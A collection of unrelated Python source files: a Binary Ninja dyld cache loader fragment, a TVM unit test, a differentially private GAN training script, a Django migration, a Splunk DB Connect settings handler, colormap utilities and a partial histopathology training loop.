write_procedures = macho_offset.optimizeOffsets(extraction_ctx)
virt_macho = BytesIO()
# Write the MachO file
for procedure in write_procedures:
virt_macho.seek(0)
virt_macho.seek(procedure.writeOffset)
virt_macho.write(
procedure.fileCtx.getBytes(procedure.readOffset, procedure.size)
)
virt_macho.seek(0)
image = ktool.load_image(virt_macho)
for segment in image.segments.values():
segment: ktool.macho.Segment = segment
seg_dat = image.get_bytes_at(segment.file_address, segment.size)
# We can map all of these as RWX or ---, it makes no difference.
# This view wont be analyzing, and MachO or ObjectiveNinja will properly map them.
self.add_auto_segment(segment.vm_address, segment.size, segment.file_address, segment.size, SegmentFlag.SegmentReadable)
self.write(segment.vm_address, bytes(seg_dat))
self.abort_analysis()
return True
@classmethod
def is_valid_for_data(cls, data):
hdr = data.read(0, 16)
if len(hdr) < 16:
return False
if b'dyld_v1' not in hdr:
return False
return True
|
python
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations # must import to defer parsing of annotations
import pytest
import tvm
from tvm import relax
from tvm.script import relax as R
import numpy as np
@tvm.script.ir_module
class InputModule:
@R.function
def foo(x: Tensor((m, n), "int64")):
y = relax.unique(x, sorted=False)
y_sorted = relax.unique(x)
return y, y_sorted
def test_unique():
mod = InputModule
# TODO(prakalp): also add test for compiling and running on cuda device.
target = tvm.target.Target("llvm")
ex = relax.vm.build(mod, target)
vm = relax.VirtualMachine(ex, tvm.cpu())
data_numpy = np.random.randint(0, 16, (16, 16))
data = tvm.nd.array(data_numpy)
result, result_sorted = vm["foo"](data)
expected_output_sorted, indices = np.unique(data_numpy, return_index=True)
expected_output = [data_numpy.flatten()[index] for index in sorted(indices, reverse=True)]
np.testing.assert_array_equal(expected_output_sorted, result_sorted.numpy())
np.testing.assert_array_equal(expected_output, result.numpy())
if __name__ == "__main__":
pytest.main([__file__])
|
python
|
import argparse
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from dp_autoencoder import Autoencoder
import mimic_dataset
import dp_optimizer
import sampling
import analysis
# Deterministic output
torch.manual_seed(0)
np.random.seed(0)
class Generator(nn.Module):
def __init__(self, input_dim, output_dim, binary=True, device='cpu'):
super(Generator, self).__init__()
def block(inp, out, Activation, device):
return nn.Sequential(
nn.Linear(inp, out, bias=False),
nn.LayerNorm(out),
Activation(),
).to(device)
self.block_0 = block(input_dim, input_dim, nn.Tanh if binary else lambda: nn.LeakyReLU(0.2), device)
self.block_1 = block(input_dim, input_dim, nn.Tanh if binary else lambda: nn.LeakyReLU(0.2), device)
self.block_2 = block(input_dim, output_dim, nn.Tanh if binary else lambda: nn.LeakyReLU(0.2), device)
def forward(self, x):
x = self.block_0(x) + x
x = self.block_1(x) + x
x = self.block_2(x)
return x
class Discriminator(nn.Module):
def __init__(self, input_dim, device='cpu'):
super(Discriminator, self).__init__()
self.model = nn.Sequential(
nn.Linear(input_dim, (2 * input_dim) // 3),
nn.LeakyReLU(0.2),
nn.Linear((2 * input_dim) // 3, input_dim // 3),
nn.LeakyReLU(0.2),
nn.Linear(input_dim // 3, 1),
).to(device)
def forward(self, x):
return self.model(x)
def train(params):
dataset = {
'mimic': mimic_dataset,
}[params['dataset']]
_, train_dataset, _, _ = dataset.get_datasets()
with open('dp_autoencoder.dat', 'rb') as f:
autoencoder = torch.load(f)
decoder = autoencoder.get_decoder()
generator = Generator(
input_dim=params['latent_dim'],
output_dim=autoencoder.get_compression_dim(),
binary=params['binary'],
device=params['device'],
)
g_optimizer = torch.optim.RMSprop(
params=generator.parameters(),
lr=params['lr'],
alpha=params['alpha'],
weight_decay=params['l2_penalty'],
)
discriminator = Discriminator(
input_dim=np.prod(train_dataset[0].shape),
device=params['device'],
)
d_optimizer = dp_optimizer.DPRMSprop(
l2_norm_clip=params['l2_norm_clip'],
noise_multiplier=params['noise_multiplier'],
minibatch_size=params['minibatch_size'],
microbatch_size=params['microbatch_size'],
params=discriminator.parameters(),
lr=params['lr'],
alpha=params['alpha'],
weight_decay=params['l2_penalty'],
)
print('Achieves ({}, {})-DP'.format(
analysis.epsilon(
len(train_dataset),
params['minibatch_size'],
params['noise_multiplier'],
params['iterations'],
params['delta']
),
params['delta'],
))
minibatch_loader, microbatch_loader = sampling.get_data_loaders(
params['minibatch_size'],
params['microbatch_size'],
params['iterations'],
)
iteration = 0
for X_minibatch in minibatch_loader(train_dataset):
d_optimizer.zero_grad()
for real in microbatch_loader(X_minibatch):
real = real.to(params['device'])
z = torch.randn(real.size(0), params['latent_dim'], device=params['device'], requires_grad=False)
fake = decoder(generator(z)).detach()
d_optimizer.zero_microbatch_grad()
d_loss = -torch.mean(discriminator(real)) + torch.mean(discriminator(fake))
d_loss.backward()
d_optimizer.microbatch_step()
d_optimizer.step()
for parameter in discriminator.parameters():
parameter.data.clamp_(-params['clip_value'], params['clip_value'])
if iteration % params['d_updates'] == 0:
z = torch.randn(X_minibatch.size(0), params['latent_dim'], device=params['device'], requires_grad=False)
fake = decoder(generator(z))
g_optimizer.zero_grad()
g_loss = -torch.mean(discriminator(fake))
g_loss.backward()
g_optimizer.step()
if iteration % 100 == 0:
print('[Iteration %d/%d] [D loss: %f] [G loss: %f]' % (iteration, params['iterations'], d_loss.item(), g_loss.item()))
iteration += 1
if iteration % 1000 == 0:
with open('dpwgans1/{}.dat'.format(iteration), 'wb') as f:
torch.save(generator, f)
return generator
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--alpha', type=float, default=0.99, help='smoothing parameter for RMS prop (default: 0.99)')
parser.add_argument('--binary', type=bool, default=True, help='whether data type is binary (default: true)')
parser.add_argument('--clip-value', type=float, default=0.01, help='upper bound on weights of the discriminator (default: 0.01)')
parser.add_argument('--d-updates', type=int, default=10, help='number of iterations to update discriminator per generator update (default: 2)')
parser.add_argument('--dataset', type=str, default='mimic', help='the dataset to be used for training (default: mimic)')
parser.add_argument('--delta', type=float, default=1e-5, help='delta for epsilon calculation (default: ~1e-5)')
parser.add_argument('--device', type=str, default=('cuda' if torch.cuda.is_available() else 'cpu'), help='whether or not to use cuda (default: cuda if available)')
parser.add_argument('--iterations', type=int, default=10000, help='number of iterations to train (default: 30000)')
parser.add_argument('--l2-norm-clip', type=float, default=0.022, help='upper bound on the l2 norm of gradient updates (default: 0.35)')
parser.add_argument('--l2-penalty', type=float, default=0., help='l2 penalty on model weights (default: 0.001)')
parser.add_argument('--latent-dim', type=int, default=64, help='dimensionality of the latent space (default: 128)')
parser.add_argument('--lr', type=float, default=0.005, help='learning rate (default: 1e-3)')
parser.add_argument('--microbatch-size', type=int, default=1, help='input microbatch size for training (default: 10)')
parser.add_argument('--minibatch-size', type=int, default=128, help='input minibatch size for training (default: 1000)')
parser.add_argument('--noise-multiplier', type=float, default=3.5, help='ratio between clipping bound and std of noise applied to gradients (default: 3.5)')
params = vars(parser.parse_args())
generator = train(params)
with open('dp_generator.dat', 'wb') as f:
torch.save(generator, f)
|
python
|
# Generated by Django 3.0.1 on 2020-01-06 22:04
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chat', '0008_message_front_key'),
]
operations = [
migrations.AddField(
model_name='message',
name='pending_read',
field=models.ManyToManyField(related_name='unread_messages', to=settings.AUTH_USER_MODEL),
),
]
|
python
|
# the first import can't be removed
import scripted_rest_sys_path
from dbx2.dbx_logger import logger
import splunk, os, json
from json import loads
from dbx2.simple_rest import SimpleRest
from dbx2.java_home_detector import JavaHomeDetector
from dbx2.splunk_client.splunk_service_factory import SplunkServiceFactory
import splunklib.client as client
import jvm_options
from dbx2.jre_validator import validateJRE, checkDependencies
import requests
class Settings(SimpleRest):
endpoint = "configs/conf-dbx_settings/java"
defaultPort = 9998
commands_endpoint = "configs/conf-commands/%s"
java_commands = ["dbxquery", "dbxoutput", "dbxlookup"]
customized_java_path = "customized.java.path"
taskserverPortProperty = "dw.server.applicationConnectors[0].port"
taskserverPortRegex = r'dw\.server\.applicationConnectors\[0\]\.port=(\d+)'
restart_url = "https://localhost:%s/api/taskserver"
def illegalAction(self, verb):
self.response.setStatus(405)
self.addMessage('ERROR', 'HTTP %s not supported by the settings handler' % verb, 405)
def handle_DELETE(self):
self.illegalAction('DELETE')
def handle_PUT(self):
self.handle_POST(self)
def handle_PATCH(self):
self.handle_POST(self)
def handle_GET(self):
try:
splunk_service = SplunkServiceFactory.create(self.sessionKey, app='splunk_app_db_connect',
owner=self.userName)
content = client.Entity(splunk_service, self.endpoint).content
self.check_java_home(content)
self.read_vmopts(content)
self.writeJson(content)
except Exception as ex:
self.response.setStatus(500)
self.writeJson({
"code": 500,
"message": ex.message,
"detail": str(ex)
})
def handle_POST(self):
try:
pre_taskserverport = self.read_taskserver_port()
payload = loads(self.request['payload'])
self.check_java_home(payload)
# check whether the javaHome is valid
self.validate_java_home(payload["javaHome"])
self.update_vmopts(payload)
splunk_service = SplunkServiceFactory.create(self.sessionKey, app='splunk_app_db_connect',
owner=self.userName)
entity = client.Entity(splunk_service, self.endpoint)
entity.update(**payload).refresh()
logger.debug('updated java settings')
self.update_dbx_java_home(payload["javaHome"])
self.reset_java_command_filename(splunk_service)
self.read_vmopts(entity.content)
self.restart_task_server(pre_taskserverport)
self.writeJson(entity.content)
except Exception as ex:
self.response.setStatus(500)
self.writeJson({
"code": 500,
"message": ex.message,
"detail": str(ex)
})
def check_java_home(self, content):
if "javaHome" not in content:
if "JAVA_HOME" in os.environ:
java_home = os.environ["JAVA_HOME"].replace('"', '')
content["javaHome"] = java_home
else:
try:
java_home = JavaHomeDetector.detect()
content["javaHome"] = java_home
except Exception as ex:
logger.warn("java home auto detection failed")
content["javaHome"] = ""
# DBX-3248 write java home to specific file so that it can be used to start server and java search command.
def update_dbx_java_home(self, javaHome):
app_dir = os.path.join(os.path.dirname(__file__), '..')
java_path_darwin = os.path.join(app_dir, "darwin_x86_64", "bin", self.customized_java_path)
java_path_linux32 = os.path.join(app_dir, "linux_x86", "bin", self.customized_java_path)
java_path_linux64 = os.path.join(app_dir, "linux_x86_64", "bin", self.customized_java_path)
java_path_win32 = os.path.join(app_dir, "windows_x86", "bin", self.customized_java_path)
java_path_win64 = os.path.join(app_dir, "windows_x86_64", "bin", self.customized_java_path)
java_home_files = [
{"filename": java_path_darwin, "suffix": "/bin/java"},
{"filename": java_path_linux32, "suffix": "/bin/java"},
{"filename": java_path_linux64, "suffix": "/bin/java"},
{"filename": java_path_win32, "suffix": "\\bin\\java.exe"},
{"filename": java_path_win64, "suffix": "\\bin\\java.exe"}
]
for java_home_file in java_home_files:
try:
with open(java_home_file["filename"], "w") as file:
file.write(javaHome + java_home_file["suffix"])
logger.info('update java path file [%s]' % java_home_file["filename"])
except IOError as er:
logger.error('unable to update java path file [%s]' % java_home_file["filename"])
raise
def reset_java_command_filename(self, splunk_service):
for java_command in self.java_commands:
entity = client.Entity(splunk_service, self.commands_endpoint % java_command)
# If customer have set the filename to "customized.java.path", we need to reset it to "java.path"
# Related issue: DBX-3746
if entity["filename"] == self.customized_java_path:
entity.update(filename="java.path").refresh()
logger.debug("action=reset_java_command_filename command=%s" % java_command)
def read_vmopts(self, content):
content['jvmOptions'] = ''
content['taskServerPort'] = self.defaultPort
try:
jvmopts = jvm_options.read()
content['jvmOptions'] = jvmopts
taskServerPort = jvm_options.get_property(jvmopts, self.taskserverPortProperty, self.taskserverPortRegex)
if taskServerPort:
content['taskServerPort'] = int(taskServerPort)
except Exception as ex:
logger.error('unable to read vmopts file [%s]' % ex)
raise
def update_vmopts(self, content):
try:
jvmopts = content.pop('jvmOptions', '') # jvmOptions may contain taskServerPort settings
taskServerPort = content.pop('taskServerPort', self.defaultPort)
logger.debug('action=get_vmopts_from_postdata, jvmOptions: [%s], taskServerPort: [%s]'
% (jvmopts, taskServerPort))
if not isinstance(taskServerPort, int):
raise Exception("task server port must be a int value")
if taskServerPort < 1024 or taskServerPort > 65535:
raise Exception('task server port must be a number in [1024, 65535]')
jvmopts = jvm_options.set_property(jvmopts, self.taskserverPortProperty, self.taskserverPortRegex, str(taskServerPort))
jvm_options.write(jvmopts)
except Exception as ex:
logger.error('unable to update vmopts file [%s]' % ex)
raise
def validate_java_home(self, java_home):
if os.path.isdir(java_home):
java_cmd = os.path.join(java_home, "bin", "java")
is_valid, reason = validateJRE(java_cmd)
if is_valid:
is_valid, reason = checkDependencies(java_home)
if not is_valid:
raise Exception(reason)
else:
raise Exception("JAVA_HOME path not exist")
@classmethod
def read_taskserver_port(cls):
try:
jvmopts = jvm_options.read()
taskServerPort = jvm_options.get_property(jvmopts, cls.taskserverPortProperty, cls.taskserverPortRegex)
if taskServerPort:
return taskServerPort
else:
return cls.defaultPort
except Exception as ex:
logger.error('unable to read vmopts file, use default port 8080, error info: [%s]' % ex)
return cls.defaultPort
def restart_task_server(self, taskserver_port):
try:
# settings update successfully, then trigger restart server api to make change taking effect
requests.delete(self.restart_url % taskserver_port, verify=False)
except Exception as ex:
# if task server is not running, this request will failed
logger.warn("action=restart_task_server_request_failed", ex)
|
python
|
class Solution(object):
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# a ^ 0 == a
# a ^ a == 0
# a ^ b ^ a = a ^ a ^ b = 0 ^ b = b
a = 0
for i in nums:
a ^= i
print(a)
return a
print(15 ^ 10)
print(10 ^ 15)
solver = Solution()
solver.singleNumber([4,1,2,1,2])
|
python
|
# This software is open source software available under the BSD-3 license.
#
# Copyright (c) 2020 Triad National Security, LLC. All rights reserved.
# Copyright (c) 2020 Lawrence Livermore National Security, LLC. All rights
# reserved.
# Copyright (c) 2020 UT-Battelle, LLC. All rights reserved.
#
# Additional copyright and license information can be found in the LICENSE file
# distributed with this code, or at
# https://raw.githubusercontent.com/MPAS-Dev/MPAS-Analysis/master/LICENSE
"""
Utilities for handling color maps and color bars
"""
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani, Luke Van Roekel, Greg Streletz
from __future__ import absolute_import, division, print_function, \
unicode_literals
import matplotlib.pyplot as plt
import matplotlib.colors as cols
import numpy as np
from matplotlib.colors import LinearSegmentedColormap
import xml.etree.ElementTree as ET
from six.moves import configparser
import cmocean
import pkg_resources
from six import string_types
import mpas_analysis.shared.plot.ScientificColourMaps5
def setup_colormap(config, configSectionName, suffix=''):
'''
Set up a colormap from the registry
Parameters
----------
config : instance of ConfigParser
the configuration, containing a [plot] section with options that
control plotting
configSectionName : str
name of config section
suffix: str, optional
suffix of colormap related options
Returns
-------
colormapDict : dict
A dictionary of colormap information.
'colormap' specifies the name of the new colormap
'norm' is a matplotlib norm object used to normalize the colormap
'levels' is an array of contour levels or ``None`` if not using indexed
color map
'ticks' is an array of values where ticks should be placed
'contours' is an array of contour values to plot or ``None`` if none
have been specified
'lineWidth' is the width of contour lines or ``None`` if not specified
'lineColor' is the color of contour lines or ``None`` if not specified
'''
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani, Greg Streletz
register_custom_colormaps()
colormapType = config.get(configSectionName,
'colormapType{}'.format(suffix))
if colormapType == 'indexed':
(colormap, norm, levels, ticks) = _setup_indexed_colormap(
config, configSectionName, suffix=suffix)
elif colormapType == 'continuous':
(colormap, norm, ticks) = _setup_colormap_and_norm(
config, configSectionName, suffix=suffix)
levels = None
else:
raise ValueError('config section {} option colormapType{} is not '
'"indexed" or "continuous"'.format(
configSectionName, suffix))
option = 'contourLevels{}'.format(suffix)
if config.has_option(configSectionName, option):
contours = config.getExpression(configSectionName,
option,
usenumpyfunc=True)
if isinstance(contours, string_types) and contours == 'none':
contours = None
else:
contours = None
option = 'contourThickness{}'.format(suffix)
if config.has_option(configSectionName, option):
lineWidth = config.getfloat(configSectionName, option)
else:
lineWidth = None
option = 'contourColor{}'.format(suffix)
if config.has_option(configSectionName, option):
lineColor = config.get(configSectionName, option)
else:
lineColor = None
return {'colormap': colormap, 'norm': norm, 'levels': levels,
'ticks': ticks, 'contours': contours, 'lineWidth': lineWidth,
'lineColor': lineColor}
def register_custom_colormaps():
name = 'ferret'
backgroundColor = (0.9, 0.9, 0.9)
red = np.array([[0, 0.6],
[0.15, 1],
[0.35, 1],
[0.65, 0],
[0.8, 0],
[1, 0.75]])
green = np.array([[0, 0],
[0.1, 0],
[0.35, 1],
[1, 0]])
blue = np.array([[0, 0],
[0.5, 0],
[0.9, 0.9],
[1, 0.9]])
colorCount = 21
colorList = np.ones((colorCount, 4), float)
colorList[:, 0] = np.interp(np.linspace(0, 1, colorCount),
red[:, 0], red[:, 1])
colorList[:, 1] = np.interp(np.linspace(0, 1, colorCount),
green[:, 0], green[:, 1])
colorList[:, 2] = np.interp(np.linspace(0, 1, colorCount),
blue[:, 0], blue[:, 1])
colorList = colorList[::-1, :]
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
colorMap.set_bad(backgroundColor)
_register_colormap_and_reverse(name, colorMap)
name = 'erdc_iceFire_H'
colorArray = np.array([
[-1, 4.05432e-07, 0, 5.90122e-06],
[-0.87451, 0, 0.120401, 0.302675],
[-0.74902, 0, 0.216583, 0.524574],
[-0.623529, 0.0552475, 0.345025, 0.6595],
[-0.498039, 0.128047, 0.492588, 0.720288],
[-0.372549, 0.188955, 0.641309, 0.792092],
[-0.247059, 0.327673, 0.784935, 0.873434],
[-0.121569, 0.60824, 0.892164, 0.935547],
[0.00392157, 0.881371, 0.912178, 0.818099],
[0.129412, 0.951407, 0.835621, 0.449279],
[0.254902, 0.904481, 0.690489, 0],
[0.380392, 0.85407, 0.510864, 0],
[0.505882, 0.777093, 0.33018, 0.00088199],
[0.631373, 0.672862, 0.139087, 0.00269398],
[0.756863, 0.508815, 0, 0],
[0.882353, 0.299417, 0.000366289, 0.000547829],
[1, 0.0157519, 0.00332021, 4.55569e-08]], float)
colorCount = 255
colorList = np.ones((colorCount, 4), float)
x = colorArray[:, 0]
for cIndex in range(3):
colorList[:, cIndex] = np.interp(
np.linspace(-1., 1., colorCount),
x, colorArray[:, cIndex + 1])
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
_register_colormap_and_reverse(name, colorMap)
name = 'erdc_iceFire_L'
colorArray = np.array([
[-1, 0.870485, 0.913768, 0.832905],
[-0.87451, 0.586919, 0.887865, 0.934003],
[-0.74902, 0.31583, 0.776442, 0.867858],
[-0.623529, 0.18302, 0.632034, 0.787722],
[-0.498039, 0.117909, 0.484134, 0.713825],
[-0.372549, 0.0507239, 0.335979, 0.654741],
[-0.247059, 0, 0.209874, 0.511832],
[-0.121569, 0, 0.114689, 0.28935],
[0.00392157, 0.0157519, 0.00332021, 4.55569e-08],
[0.129412, 0.312914, 0, 0],
[0.254902, 0.520865, 0, 0],
[0.380392, 0.680105, 0.15255, 0.0025996],
[0.505882, 0.785109, 0.339479, 0.000797922],
[0.631373, 0.857354, 0.522494, 0],
[0.756863, 0.910974, 0.699774, 0],
[0.882353, 0.951921, 0.842817, 0.478545],
[1, 0.881371, 0.912178, 0.818099]], float)
colorCount = 255
colorList = np.ones((colorCount, 4), float)
x = colorArray[:, 0]
for cIndex in range(3):
colorList[:, cIndex] = np.interp(
np.linspace(-1., 1., colorCount),
x, colorArray[:, cIndex + 1])
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
_register_colormap_and_reverse(name, colorMap)
name = 'BuOr'
colors1 = plt.cm.PuOr(np.linspace(0., 1, 256))
colors2 = plt.cm.RdBu(np.linspace(0, 1, 256))
# combine them and build a new colormap, just the orange from the first
# and the blue from the second
colorList = np.vstack((colors1[0:128, :], colors2[128:256, :]))
# reverse the order
colorList = colorList[::-1, :]
colorMap = cols.LinearSegmentedColormap.from_list(name, colorList)
_register_colormap_and_reverse(name, colorMap)
name = 'Maximenko'
colorArray = np.array([
[-1, 0., 0.45882352941, 0.76470588235],
[-0.666667, 0., 0.70196078431, 0.90588235294],
[-0.333333, 0.3294117647, 0.87058823529, 1.],
[0., 0.76470588235, 0.94509803921, 0.98039215686],
[0.333333, 1., 1., 0.],
[0.666667, 1., 0.29411764705, 0.],
[1, 1., 0., 0.]], float)
colorCount = 255
colorList = np.ones((colorCount, 4), float)
x = colorArray[:, 0]
for cIndex in range(3):
colorList[:, cIndex] = np.interp(
np.linspace(-1., 1., colorCount),
x, colorArray[:, cIndex + 1])
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
_register_colormap_and_reverse(name, colorMap)
# add the cmocean color maps
mapNames = list(cmocean.cm.cmapnames)
# don't bother with gray (already exists, I think)
mapNames.pop(mapNames.index('gray'))
for mapName in mapNames:
_register_colormap_and_reverse(mapName, getattr(cmocean.cm, mapName))
# add SciVisColor colormaps from
# https://sciviscolor.org/home/colormaps/
for mapName in ['3wave-yellow-grey-blue', '3Wbgy5',
'4wave-grey-red-green-mgreen', '5wave-yellow-brown-blue',
'blue-1', 'blue-3', 'blue-6', 'blue-8', 'blue-orange-div',
'brown-2', 'brown-5', 'brown-8', 'green-1', 'green-4',
'green-7', 'green-8', 'orange-5', 'orange-6',
'orange-green-blue-gray', 'purple-7', 'purple-8', 'red-1',
'red-3', 'red-4', 'yellow-1', 'yellow-7']:
xmlFile = pkg_resources.resource_filename(
__name__, 'SciVisColorColormaps/{}.xml'.format(mapName))
_read_xml_colormap(xmlFile, mapName)
name = 'white_cmo_deep'
# modify cmo.deep to start at white
colors2 = plt.cm.get_cmap('cmo.deep')(np.linspace(0, 1, 224))
colorCount = 32
colors1 = np.ones((colorCount, 4), float)
x = np.linspace(0., 1., colorCount+1)[0:-1]
white = [1., 1., 1., 1.]
for cIndex in range(4):
colors1[:, cIndex] = np.interp(x, [0., 1.],
[white[cIndex], colors2[0, cIndex]])
colors = np.vstack((colors1, colors2))
# generating a smoothly-varying LinearSegmentedColormap
cmap = LinearSegmentedColormap.from_list(name, colors)
_register_colormap_and_reverse(name, cmap)
def _setup_colormap_and_norm(config, configSectionName, suffix=''):
'''
Set up a colormap from the registry
Parameters
----------
config : instance of ConfigParser
the configuration, containing a [plot] section with options that
control plotting
configSectionName : str
name of config section
suffix: str, optional
suffix of colormap related options
Returns
-------
colormap : srt
new colormap
norm : ``mapplotlib.colors.Normalize``
the norm used to normalize the colormap
ticks : array of float
the tick marks on the colormap
'''
# Authors
# -------
# Xylar Asay-Davis
register_custom_colormaps()
colormap = plt.get_cmap(config.get(configSectionName,
'colormapName{}'.format(suffix)))
normType = config.get(configSectionName, 'normType{}'.format(suffix))
kwargs = config.getExpression(configSectionName,
'normArgs{}'.format(suffix))
if normType == 'symLog':
norm = cols.SymLogNorm(**kwargs)
elif normType == 'log':
norm = cols.LogNorm(**kwargs)
elif normType == 'linear':
norm = cols.Normalize(**kwargs)
else:
raise ValueError('Unsupported norm type {} in section {}'.format(
normType, configSectionName))
try:
ticks = config.getExpression(
configSectionName, 'colorbarTicks{}'.format(suffix),
usenumpyfunc=True)
except(configparser.NoOptionError):
ticks = None
return (colormap, norm, ticks)
def _setup_indexed_colormap(config, configSectionName, suffix=''):
'''
Set up a colormap from the registry
Parameters
----------
config : instance of ConfigParser
the configuration, containing a [plot] section with options that
control plotting
configSectionName : str
name of config section
suffix: str, optional
suffix of colormap related options
colorMapType
Returns
-------
colormap : srt
new colormap
norm : ``mapplotlib.colors.Normalize``
the norm used to normalize the colormap
ticks : array of float
the tick marks on the colormap
'''
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani, Greg Streletz
colormap = plt.get_cmap(config.get(configSectionName,
'colormapName{}'.format(suffix)))
indices = config.getExpression(configSectionName,
'colormapIndices{}'.format(suffix),
usenumpyfunc=True)
try:
levels = config.getExpression(
configSectionName, 'colorbarLevels{}'.format(suffix),
usenumpyfunc=True)
except(configparser.NoOptionError):
levels = None
if levels is not None:
# set under/over values based on the first/last indices in the colormap
underColor = colormap(indices[0])
overColor = colormap(indices[-1])
if len(levels) + 1 == len(indices):
# we have 2 extra values for the under/over so make the colormap
# without these values
indices = indices[1:-1]
elif len(levels) - 1 != len(indices):
# indices list must be either one element shorter
# or one element longer than colorbarLevels list
raise ValueError('length mismatch between indices and '
'colorbarLevels')
colormap = cols.ListedColormap(colormap(indices),
'colormapName{}'.format(suffix))
colormap.set_under(underColor)
colormap.set_over(overColor)
norm = cols.BoundaryNorm(levels, colormap.N)
try:
ticks = config.getExpression(
configSectionName, 'colorbarTicks{}'.format(suffix),
usenumpyfunc=True)
except(configparser.NoOptionError):
ticks = levels
return (colormap, norm, levels, ticks)
def _read_xml_colormap(xmlFile, mapName):
'''Read in an XML colormap'''
xml = ET.parse(xmlFile)
root = xml.getroot()
colormap = root.findall('ColorMap')
if len(colormap) > 0:
colormap = colormap[0]
colorDict = {'red': [], 'green': [], 'blue': []}
for point in colormap.findall('Point'):
x = float(point.get('x'))
color = [float(point.get('r')), float(point.get('g')),
float(point.get('b'))]
colorDict['red'].append((x, color[0], color[0]))
colorDict['green'].append((x, color[1], color[1]))
colorDict['blue'].append((x, color[2], color[2]))
cmap = LinearSegmentedColormap(mapName, colorDict, 256)
_register_colormap_and_reverse(mapName, cmap)
def _register_colormap_and_reverse(mapName, cmap):
if mapName not in plt.colormaps():
plt.register_cmap(mapName, cmap)
plt.register_cmap('{}_r'.format(mapName), cmap.reversed())
def _plot_color_gradients():
'''from https://matplotlib.org/tutorials/colors/colormaps.html'''
cmap_list = [m for m in plt.colormaps() if not m.endswith("_r")]
gradient = np.linspace(0, 1, 256)
gradient = np.vstack((gradient, gradient))
nrows = len(cmap_list)
fig, axes = plt.subplots(figsize=(7.2, 0.25 * nrows), nrows=nrows)
fig.subplots_adjust(top=0.99, bottom=0.01, left=0.35, right=0.99)
for ax, name in zip(axes, cmap_list):
ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(name))
pos = list(ax.get_position().bounds)
x_text = pos[0] - 0.01
y_text = pos[1] + pos[3] / 2.
fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)
# Turn off *all* ticks & spines, not just the ones with colormaps.
for ax in axes:
ax.set_axis_off()
plt.savefig('colormaps.png', dpi=100)
# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
|
python
|
from typing import Tuple, Type, List, Dict, Union
from pyfileconf.main import PipelineManager, SpecificClassConfigDict
def get_pipeline_dict_path_and_specific_class_config_dicts_from_manager(manager: PipelineManager
) -> Tuple[
str,
List[SpecificClassConfigDict]
]:
return manager.pipeline_dict_path, manager.specific_class_config_dicts
|
python
|
"""
Task-Specific consistency training on downstream task (BreastPathQ)
"""
import argparse
import os
import time
import random
import numpy as np
from PIL import Image
import cv2
import copy
import pingouin as pg
import statsmodels.api as sm
import pandas as pd
from tqdm import tqdm
import torch.backends.cudnn as cudnn
import torch
from torch.utils.data import Dataset, Subset
import torch.optim as optim
import torch.nn.functional as F
import torch.nn as nn
from util import AverageMeter, plot_confusion_matrix
from collections import OrderedDict
from torchvision import transforms, datasets
from dataset import DatasetBreastPathQ_eval, DatasetBreastPathQ_SSLtrain, DatasetBreastPathQ_Supervised_train, TransformFix
import models.net as net
from albumentations import Compose
from sklearn.metrics import multilabel_confusion_matrix
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedShuffleSplit
from torch.utils.data.sampler import SubsetRandomSampler
###########
def train(args, model_teacher, model_student, classifier_teacher, classifier_student, labeled_train_loader, unlabeled_train_loader, optimizer, epoch):
"""
Consistency training
"""
model_teacher.eval()
classifier_teacher.eval()
model_student.train()
classifier_student.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
losses_x = AverageMeter()
losses_u = AverageMeter()
total_feats = []
total_targets = []
end = time.time()
train_loader = zip(labeled_train_loader, unlabeled_train_loader)
for batch_idx, (data_x, data_u) in enumerate(tqdm(train_loader, disable=False)):
# Get inputs and target
inputs_x, targets_x = data_x
inputs_u_w, inputs_u_s = data_u
inputs_x, inputs_u_w, inputs_u_s, targets_x = inputs_x.float(), inputs_u_w.float(), inputs_u_s.float(), targets_x.float()
# Move the variables to Cuda
inputs_x, inputs_u_w, inputs_u_s, targets_x = inputs_x.cuda(), inputs_u_w.cuda(), inputs_u_s.cuda(), targets_x.cuda()
# Compute output
inputs_x = inputs_x.reshape(-1, 3, 256, 256) #Reshape
# Compute pseudolabels for weak_unlabeled images using the teacher model
with torch.no_grad():
feat_u_w = model_teacher(inputs_u_w) # weak unlabeled data
logits_u_w = classifier_teacher(feat_u_w)
# Compute output for labeled and strong_unlabeled images using the student model
inputs = torch.cat((inputs_x, inputs_u_s))
feats = model_student(inputs)
logits = classifier_student(feats)
batch_size = inputs_x.shape[0]
logits_x = logits[:batch_size] #labeled data
logits_u_s = logits[batch_size:] # unlabeled data
del logits
# Compute loss
Supervised_loss = F.mse_loss(logits_x, targets_x.view(-1, 1), reduction='mean')
Consistency_loss = F.mse_loss(logits_u_w, logits_u_s, reduction='mean')
final_loss = Supervised_loss + args.lambda_u * Consistency_loss
# compute gradient and do SGD step #############
optimizer.zero_grad()
final_loss.backward()
optimizer.step()
# compute loss and accuracy ####################
losses.update(final_loss.item(), batch_size)
losses_x.update(Supervised_loss.item(), batch_size)
losses_u.update(Consistency_loss.item(), batch_size)
# Save features
total_feats.append(feats)
total_targets.append(targets_x)
# measure elapsed time
batch_time.update(time.time() - end)
